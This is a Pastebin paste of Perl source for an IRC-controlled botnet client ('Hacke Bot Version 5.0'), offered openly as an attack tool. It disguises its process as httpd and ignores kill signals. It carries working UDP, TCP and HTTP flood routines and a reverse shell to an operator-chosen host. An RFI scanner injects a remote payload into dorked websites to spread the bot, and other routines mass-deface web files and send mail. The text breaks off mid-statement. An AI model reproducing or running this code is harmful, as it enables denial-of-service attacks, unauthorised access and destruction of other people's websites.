Advertisement
Guest User

Pitbot good

a guest
Apr 20th, 2014
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  2. # % P1tbull Pwned your BoX  %
  3. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  4. #
  5. #      ooo      
  6. #     (o o)    
  7. # ooO--(_)--Ooo-
  8. #
  9. # Hacke Bot Version 5.0 Private FiNAL
  10. #
  11. #You can use the following commands :
  12. #!bot @portscan <ip>
  13. #!bot @nmap <ip> <beginport> <endport>
  14. #!bot @back <ip><port>    
  15. #!bot @udpflood <ip> <packet size> <time>
  16. #!bot @tcpflood <ip> <port> <packet size> <time>
  17. #!bot @httpflood <site> <time>
  18. #!bot @linuxhelp
  19. #!bot @rfi <vuln> <dork>
  20. #!bot @system
  21. #!bot @milw0rm
  22. #!bot @logcleaner
  23. #!bot @deface
  24. #!bot @spread <rfi = for example www.mywebsite.com/index.php?= >
  25. #!bot @sendmail <subject> <sender> <recipient> <message>
  26. #!bot @join <#channel>    
  27. #!bot @part <#channel>
  28. #!bot @help
  29. #!bot cd tmp for example
  30. #!bot !eval <code= for example :@nickname>
  31. #
  32. # Greets too :
  33. #
  34. # % apai-P1tbull-Piticu %
  35. #
  36. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  37. # % Hacke Pwned your BoX  %
  38. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  39.  
  40. ######################
  41. use HTTP::Request;
  42. use LWP::UserAgent;
  43. ######################
  44. my $processo = '/usr/sbin/httpd';
  45. ######################
  46. #####################################################################
  47. #/!\                          .:CONFIGURATION:.                  /!\#
  48. #####################################################################
  49. ############################################
  50. my $linas_max='10';        
  51. my $sleep='3';  
  52. #-----------------                                                        
  53. #Sleep Time and Max. Lines for Anti Flood  #
  54. ############################################
  55. my $cmd=" <-- 0,12Deep inside 7Ur 4Heart 1!";
  56. my $id="ftp://****/.xpl/id.txt";
  57. my $spread="ftp://*****/.xpl/hack/id.txt";
  58. #-----------------    
  59. #Spreader, ID=Response, CMD = Print CMD    #
  60. ############################################
  61. my @adms=("P1tbull","boy","Drago");
  62. #-----------------                         #
  63. #Admins of the Bot set your nickname here  #
  64. ############################################
  65. my @canais=("#****");
  66. #-----------------                         #
  67. #Put your channel here                     #
  68. ############################################
  69. my @nickname = ("asc|0-");
  70. my $nick = $nickname[rand scalar @nickname];
  71. my $ircname ='asc-rf1';
  72. chop (my $realname = 'we r0x');
  73. #-----------------                         #
  74. #Identity                                  #
  75. ############################################
  76. $servidor='SERVER' unless $servidor;
  77. my $porta='6667';
  78. #-----------------                         #
  79. #IRCServer and port                        #
  80. ############################################
  81. #####################################################################
  82. #/!\                          .:CONFIGURATION:.                  /!\#
  83. #####################################################################
  84. ######################
  85. #End of Configuration#
  86. #                    #
  87. ######################
  88. $SIG{'INT'} = 'IGNORE';
  89. $SIG{'HUP'} = 'IGNORE';
  90. $SIG{'TERM'} = 'IGNORE';
  91. $SIG{'CHLD'} = 'IGNORE';
  92. $SIG{'PS'} = 'IGNORE';
  93. use IO::Socket;
  94. use Socket;
  95. use IO::Select;
  96. chdir("/");
  97.  
  98. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  99. # % Hacke Pwned your BoX  %
  100. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  101.  
  102. #Connect
  103. $servidor="$ARGV[0]" if $ARGV[0];
  104. $0="$processo"."\0"x16;;
  105. my $pid=fork;
  106. exit if $pid;
  107. die "Masalah fork: $!" unless defined($pid);
  108.  
  109. our %irc_servers;
  110. our %DCC;
  111. my $dcc_sel = new IO::Select->new();
  112. $sel_cliente = IO::Select->new();
  113. sub sendraw {
  114.   if ($#_ == '1') {
  115.     my $socket = $_[0];
  116.     print $socket "$_[1]\n";
  117.     } else {
  118.     print $IRC_cur_socket "$_[0]\n";
  119.   }
  120. }
  121.  
  122. sub conectar {
  123.   my $meunick = $_[0];
  124.   my $servidor_con = $_[1];
  125.   my $porta_con = $_[2];
  126.   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
  127.   PeerPort=>$porta_con) or return(1);
  128.   if (defined($IRC_socket)) {
  129.     $IRC_cur_socket = $IRC_socket;
  130.     $IRC_socket->autoflush(1);
  131.     $sel_cliente->add($IRC_socket);
  132.     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  133.     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  134.     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  135.     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  136.     nick("$meunick");
  137.     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  138.     sleep 1;
  139.   }
  140. }
  141.  
  142. my $line_temp;
  143. while( 1 ) {
  144.   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  145.   delete($irc_servers{''}) if (defined($irc_servers{''}));
  146.   my @ready = $sel_cliente->can_read(0);
  147.   next unless(@ready);
  148.   foreach $fh (@ready) {
  149.     $IRC_cur_socket = $fh;
  150.     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  151.     $nread = sysread($fh, $msg, 4096);
  152.     if ($nread == 0) {
  153.       $sel_cliente->remove($fh);
  154.       $fh->close;
  155.       delete($irc_servers{$fh});
  156.     }
  157.     @lines = split (/\n/, $msg);
  158.     for(my $c=0; $c<= $#lines; $c++) {
  159.  
  160.       $line = $lines[$c];
  161.       $line=$line_temp.$line if ($line_temp);
  162.       $line_temp='';
  163.       $line =~ s/\r$//;
  164.       unless ($c == $#lines) {
  165.         parse("$line");
  166.         } else {
  167.         if ($#lines == 0) {
  168.           parse("$line");
  169.           } elsif ($lines[$c] =~ /\r$/) {
  170.           parse("$line");
  171.           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  172.           parse("$line");
  173.                  } else {
  174.                              $line_temp = $line;
  175.         }
  176.       }
  177.     }
  178.   }
  179. }
  180.  
  181. sub parse {
  182.   my $servarg = shift;
  183.   if ($servarg =~ /^PING \:(.*)/) {
  184.     sendraw("PONG :$1");
  185.     } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  186.     my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  187.     if ($args =~ /^\001VERSION\001$/) {
  188.            notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
  189.     }
  190.     if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
  191.     if ($onde eq "$meunick"){
  192.     shell("$pn", "$args");
  193.   }
  194.  
  195. #End of Connect
  196.  
  197. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  198. # % Hacke Pwned your BoX  %
  199. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  200. ######################
  201. #      PREFIX        #
  202. #                    #
  203. ######################
  204. # You can change the prefix if you want but the commands will be different
  205. # The standard prefix is !bot if you change it into !bitch for example
  206. # every command will be like !bitch @udpflood, !bitch @rfi.
  207. # So its recommended not to change this;)
  208. ######################
  209.  
  210.   if ($args =~ /^(\Q$meunick\E|\!asc)\s+(.*)/ ) {
  211.     my $natrix = $1;
  212.     my $arg = $2;
  213.     if ($arg =~ /^\!(.*)/) {
  214.       ircase("$pn","$onde","$1") unless ($natrix eq "!asc" and $arg =~ /^\!nick/);
  215.       } elsif ($arg =~ /^\@(.*)/) {
  216.       $ondep = $onde;
  217.       $ondep = $pn if $onde eq $meunick;
  218.       bfunc("$ondep","$1");
  219.       } else {
  220.       shell("$onde", "$arg");
  221.     }
  222.   }
  223. }
  224. }
  225. ######################
  226. #   End of PREFIX    #
  227. #                    #
  228. ######################
  229.  
  230. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  231. if (lc($1) eq lc($meunick)) {
  232.   $meunick=$4;
  233.   $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  234. }
  235. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  236. nick("$meunick".int rand(999999));
  237. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  238. $meunick = $2;
  239. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  240. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  241. foreach my $canal (@canais) {
  242.   sendraw("JOIN $canal ddosit");
  243. }
  244. }
  245. }
  246.  
  247. sub bfunc {
  248. my $printl = $_[0];
  249. my $funcarg = $_[1];
  250. if (my $pid = fork) {
  251. waitpid($pid, 0);
  252. } else {
  253. if (fork) {
  254.   exit;
  255. } else {
  256.  
  257. ######################
  258. #       Help         #
  259. #                    #
  260. ######################
  261.  
  262. if ($funcarg =~ /^help/) {
  263.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 Select the function you want help for");
  264.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 4,1@9,1ddos");
  265.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 1,4@9,1rfiscan");
  266.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 1,4@9,1backconnect");
  267.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 1,4@9,1shell");
  268.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 1,4@9,1portscanner");
  269.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 Or if you want too know all the commands type:");
  270.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help4,1] 4,1 !bot 1,4@9,1commands");
  271.  
  272. }
  273.  
  274. if ($funcarg =~ /^ddos/) {
  275.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1There are DDossers in this bot");
  276.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 UDPFlood, HTTPFlood and TCPFlood");
  277.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1!bot 1,4@9,1udpflood <ip> <packet size> <time>");
  278.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@9,1tcpflood <ip> <port> <packet size> <time>");
  279.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@9,1httpflood <site> <time>");
  280.  
  281. }
  282.  
  283. if ($funcarg =~ /^rfiscan/) {
  284.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 This bot also contains a RFI Scanner.");
  285.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 Commands :");
  286.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1rfi <vuln> <dork>");
  287.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1You can find strings here : http://www.xshqiptaretx.org/strings.txt ");
  288.  
  289. }
  290.  
  291. if ($funcarg =~ /^backconnect/) {
  292.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 You use backconnect like this :");
  293.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1back <ip><port>");
  294. }
  295.  
  296. if ($funcarg =~ /^shell/) {
  297.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 This bot has a integrated shell");
  298.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 You can use it in private but also public in the channel");
  299.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 In public channel just use : 4,1!bot cd tmp9,1 for example");
  300.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 For help with the linux commands type :4,1!bot 1,4@4,1linuxhelp");
  301. }
  302.  
  303. if ($funcarg =~ /^portscanner/) {
  304.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 There is a normal portscan and a Nmap:");
  305.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1portscan <ip>");
  306.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1nmap <ip> <beginport> <endport>");
  307. }
  308.  
  309. if ($funcarg =~ /^commands/) {
  310.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 4,1 You can use the following commands :");
  311.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1portscan <ip>");
  312.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1nmap <ip> <beginport> <endport>");
  313.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1back <ip><port>");    
  314.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 4,1cd tmp 9,1 for example");
  315.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1udpflood <ip> <packet size> <time>");
  316.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1tcpflood <ip> <port> <packet size> <time>");
  317.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1httpflood <site> <time>");
  318.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1linuxhelp");
  319.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1spread <rfi>");
  320.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1rfi <vuln> <dork>");
  321.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1system");
  322.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1logcleaner");
  323.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1deface");
  324.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1sendmail <subject> <sender> <recipient> <message>");
  325.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1milw0rm");    
  326.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1!bot 1,4@4,1join #channel");    
  327.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Help9,1] 9,1 !bot 1,4@4,1part #channel");
  328. }
  329.  
  330. if ($funcarg =~ /^linuxhelp/) {
  331.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Dir where you are : pwd");
  332.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Start a Perl file : perl file.pl");
  333.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Go back from dir : cd ..");
  334.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Force to Remove a file/dir : rm -rf file/dir;ls -la");
  335.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Show all files/dir with permissions : ls -lia");
  336.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Find config.inc.php files : find / -type f -name config.inc.php");
  337.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Find all writable folders and files : find / -perm -2 -ls");
  338.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1 Find all .htpasswd files : find / -type f -name .htpasswd");
  339.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1LiNuX9,1] 9,1 - 4,1Find all service.pwd files : find / -type f -name service.pwd");
  340. }
  341.  
  342. ######################
  343. #   End of  Help     #
  344. #                    #
  345. ######################
  346. if ($funcarg =~ /^spread\s+(.*)/) {
  347.     $vuln = $1;
  348.                             sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Spread9,1] Spreading bot on :4,1 $vuln");
  349.         my $shellurl="http://".$vuln.$spread."?";
  350.             my $reqz=HTTP::Request->new(GET=>$shellurl);
  351.                 my $ua=LWP::UserAgent->new();
  352.                     my $response=$ua->request($reqz);
  353.                             sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Spread9,1] Bot is Spreaded on :4,1 $vuln");
  354. }
  355.  
  356.  
  357. ######################
  358. #   Mass Deface      #
  359. #                    #
  360. ######################
  361. #########################
  362. # Mass Defacer v2.0     #
  363. # Coded By illuz1oN     #
  364. # Modded by Hacke #
  365. #########################
  366.  
  367. if ($funcarg =~ /^deface/) {
  368. $def = ' P1tbull Pwned your BoX ';
  369. {
  370. print qq^
  371. ^;
  372. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Mass Deface Started !");
  373.          sleep(1);
  374. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[4@9,1Deface9,1] Defacing :4,1 .PHP");
  375.        sleep(1);
  376.      my @php = glob("*.php"); #Files
  377.      foreach my $deface(@php){
  378.      open(DEFACE, '>', $deface);
  379.      print DEFACE $def;
  380.      close(DEFACE)
  381.   }
  382. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .HTML");
  383.          sleep(1);      
  384.      my @html = glob("*.html"); #Files
  385.      foreach my $deface(@html){
  386.      open(DEFACE, '>', $deface);
  387.      print DEFACE $def;
  388.      close(DEFACE)
  389.   }
  390. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .ASP");
  391.        sleep(1);
  392.        my @asp = glob("*.asp"); #Files
  393.      foreach my $deface(@asp){
  394.      open(DEFACE, '>', $deface);
  395.      print DEFACE $def;
  396.      close(DEFACE)
  397.   }
  398. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .ASPX");
  399.        sleep(1);
  400.        my @aspx = glob("*.aspx"); #Files
  401.      foreach my $deface(@aspx){
  402.      open(DEFACE, '>', $deface);
  403.      print DEFACE $def;
  404.      close(DEFACE)
  405.   }
  406. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .HTM");
  407.        sleep(1);
  408.        my @htm = glob("*.htm"); #Files
  409.      foreach my $deface(@htm){
  410.      open(DEFACE, '>', $deface);
  411.      print DEFACE $def;
  412.      close(DEFACE)
  413.   }    
  414. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .JS");
  415.        sleep(1);
  416.        my @js = glob("*.js"); #Files
  417.      foreach my $deface(@js){
  418.      open(DEFACE, '>', $deface);
  419.      print DEFACE $def;
  420.      close(DEFACE)
  421.   }
  422. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Defacing :4,1 .AC");
  423.        sleep(1);
  424.        my @ac = glob("*.ac"); #Files
  425.      foreach my $deface(@ac){
  426.      open(DEFACE, '>', $deface);
  427.      print DEFACE $def;
  428.      close(DEFACE)
  429.   }
  430. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Deface9,1] Mass Deface is Done !");
  431.   sleep(2);
  432.   exit;
  433. }}    
  434.  
  435. ######################
  436. #End of  Mass Deface #
  437. #                    #
  438. ######################
  439. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  440. # % Hacke Pwned your BoX  %
  441. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  442. ######################
  443. #     Commands       #
  444. #                    #
  445. ######################
  446.  
  447. if ($funcarg =~ /^system/) {
  448. $uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
  449.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1Info BOT : 9.1 Servidor :Hiden : 6667");
  450.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1Uname -a     : 4,1 $uname");
  451.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1Uptime       : 4,1 $uptime");
  452.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1Own Prosses  : 4,1 $processo");
  453.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1ID           : 4,1$id");
  454.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[4@9,1SystemInfo9,1] 4,1Own Dir      : 4,1 $ownd");
  455.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1OS           : 4,1 $distro");
  456.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1 4,1Owner        : 4,8 P1tbull");
  457.     sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1SystemInfo9,1] 4,1Channel      : 4,8 #private");
  458. }
  459.  
  460. if ($funcarg =~ /^milw0rm/) {
  461.     my @ltt=();
  462.     my @bug=();
  463.     my $x;
  464.     my $page="";
  465.     my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
  466.     print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/
  467. ######################
  468. #       MAILER       #  
  469. #                    #
  470. ######################
  471. # For mailing use :
  472. # !bot @sendmail <subject> <sender> <recipient> <message>
  473. #
  474. ######################
  475. if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
  476. sendraw($IRC_cur_socket, "PRIVMSG $printl :[@Mailer] Sending Mail to :$3");
  477. $subject = $1;
  478. $sender = $2;
  479. $recipient = $3;
  480. @corpo = $4;
  481. $mailtype = "content-type: text/html";
  482. $sendmail = '/usr/sbin/sendmail';
  483. open (SENDMAIL, "| $sendmail -t");
  484. print SENDMAIL "$mailtype\n";
  485. print SENDMAIL "Subject: $subject\n";
  486. print SENDMAIL "From: $sender\n";
  487. print SENDMAIL "To: $recipient\n\n";
  488. print SENDMAIL "@corpo\n\n";
  489. close (SENDMAIL);
  490. sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Mailer4,1] Mail Sended To :4,1 $recipient");
  491. }
  492. ######################
  493. #   End of MAILER    #  
  494. #                    #
  495. ######################
  496. ######################
  497. #  Join And Part     #
  498. #                    #
  499. ######################
  500.            if ($funcarg =~ /^join (.*)/) {
  501.               sendraw($IRC_cur_socket, "JOIN ".$1);
  502.            }
  503.            if ($funcarg =~ /^part (.*)/) {
  504.               sendraw($IRC_cur_socket, "PART ".$1);
  505.            }
  506.          
  507. ######################
  508. #End of Join And Part#
  509. #                    #
  510. ######################
  511. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  512. # % Hacke Pwned your BoX  %
  513. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  514. ######################
  515. #     TCPFlood       #
  516. #                    #
  517. ######################
  518.  
  519. if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  520.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1TCP-DDOS4,1] Attacking 4,1 ".$1.":".$2." 9,1for 9,1 ".$3." 4,1seconds.");
  521.   my $itime = time;
  522.   my ($cur_time);
  523.   $cur_time = time - $itime;
  524.   while ($3>$cur_time){
  525.   $cur_time = time - $itime;
  526.   &tcpflooder("$1","$2","$3");
  527. }
  528. sendraw($IRC_cur_socket,"PRIVMSG $printl :9,1[1,4@9,1TCP-DDOS4,1] Attack done 4,1 ".$1.":".$2.".");
  529. }
  530. ######################
  531. #  End of TCPFlood   #
  532. #                    #
  533. ######################
  534. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  535. # % Hacke Pwned your BoX  %
  536. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  537. ######################
  538. #   Back Connect     #
  539. #                    #
  540. ######################
  541. if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
  542. my $host = "$1";
  543. my $porta = "$2";
  544. my $proto = getprotobyname('tcp');
  545. my $iaddr = inet_aton($host);
  546. my $paddr = sockaddr_in($porta, $iaddr);
  547. my $shell = "/bin/sh -i";
  548. if ($^O eq "MSWin32") {
  549.   $shell = "cmd.exe";
  550. }
  551. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  552. connect(SOCKET, $paddr) or die "connect: $!";
  553. open(STDIN, ">&SOCKET");
  554. open(STDOUT, ">&SOCKET");
  555. open(STDERR, ">&SOCKET");
  556. system("$shell");
  557. close(STDIN);
  558. close(STDOUT);
  559. close(STDERR);
  560. if ($estatisticas)
  561. {
  562.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1BackConnect4,1] Connecting to 9,1 $host:$porta");
  563. }
  564. }
  565. ######################
  566. #End of  Back Connect#
  567. #                    #
  568. ######################
  569. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  570. # % Hacke Pwned your BoX  %
  571. # %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
  572. ######################
  573. #    EXTREME SCANNER #
  574. #                    #
  575. ######################
  576. ######################################################################
  577. #################### GOOGLE
  578. ######################################################################
  579. if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
  580. if (my $pid = fork) {
  581. waitpid($pid, 0);
  582. } else {
  583. if (fork) {
  584. exit;
  585. } else {
  586. my $bug=$1;
  587. my $dork=$2;
  588. my $contatore=0;
  589. my %hosts;
  590. ### Start Message
  591.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@4,1Scan9,1] The [E]xtreme RFiScan is started for 4,1$dork");
  592. ### End of Start Message
  593. # Starting The Search Engine
  594.     my @google=&googlet($dork);
  595. #
  596. push(my @tot, @google);
  597. #
  598. my @puliti=&unici(@tot);
  599.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11G13o11o13g11l13e9,1 Total:4 ".scalar(@tot)." 9,1Cleaned:4 ".scalar(@puliti)." 9,1for 4,1 $dork ");
  600. my $uni=scalar(@puliti);
  601. foreach my $sito (@puliti)
  602. {
  603. $contatore++;
  604. if ($contatore %100==0){
  605. }
  606. if ($contatore==$uni-1){
  607.   sendraw($IRC_cur_socket, "PRIVMSG $printl :9,1[1,4@9,1Scan9,1] 11G13o11o13g11l13e9,1 finished for4,1 $dork");
  608. }
  609. ### Print CMD and TEST CMD###
  610. my $test="http://".$sito.$bug.$id."?";
  611. my $print="http://".$sito.$bug.$cmd."?";
  612. ### End of Print CMD and TEST CMD###
  613. my $req=HTTP::Request->new(GET=>$test);
  614. my $ua=LWP::UserAgent->new();
  615. $ua->timeout(5);
  616. my $response=$ua->request($req);
  617. if ($response->is_success) {
  618. my $re=$response->content;
  619. if($re =~ /Mic22/ && $re =~ /uid=/){
  620. my $hs=geths($print); $hosts{$hs}++;
  621. if($hosts{$hs}=="1"){
  622.   sendraw($IRC_cur_socket, "PRIVMSG $printl :1,9[1,9@1,9Vuln1,9] 1,9(1,9SafeMode:1,9OFF1,9) 1,9(1,9Site:12,9$print 1,9) ");
  623.   sendraw($IRC_cur_socket, "PRIVMSG P1tbull : $print ");
  624.   my $test2="http://".$sito.$bug.$spread."?";
  625. my $reqz=HTTP::Request->new(GET=>$test2);
  626. my $ua=LWP::UserAgent->new();
  627. my $response=$ua->request($reqz);
  628. }}
  629. elsif($re =~ /Mic22/)
  630. {
  631. my $hs=geths($print); $hosts{$hs}++;
  632. if($hosts{$hs}=="1"){
  633.   sendraw($IRC_cur_socket, "PRIVMSG $printl :[@Vuln] (SafeMode:ON) 1,4(Site:$print) ");
  634. my $test2="http://".$sito.$bug.$spread."?";
  635. my $reqz=HTTP::Request->new(GET=>$test2);
  636. my $ua=LWP::UserAgent->new();
  637. my $response=$ua->request($reqz);
  638. }}
